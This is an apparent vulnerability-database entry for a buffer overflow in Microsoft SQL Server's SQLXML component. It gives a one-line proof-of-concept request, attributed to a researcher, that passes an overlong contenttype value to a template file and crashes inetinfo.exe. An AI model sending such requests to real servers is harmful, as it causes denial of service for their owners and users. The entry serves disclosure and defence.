Microsoft SQL Server SQLXML Buffer Overflow Vulnerability

info
discussion
exploit
solution
references

Microsoft SQL Server SQLXML Buffer Overflow Vulnerability

The following proof of concept was provided by Matt Moore <matt@westpoint.ltd.uk>:

IIS-Server/Nwind/Template/catalog.xml?contenttype=text/AAAA...AAA

This uses a 'template' file instead of a direct query to cause inetinfo.exe to crash.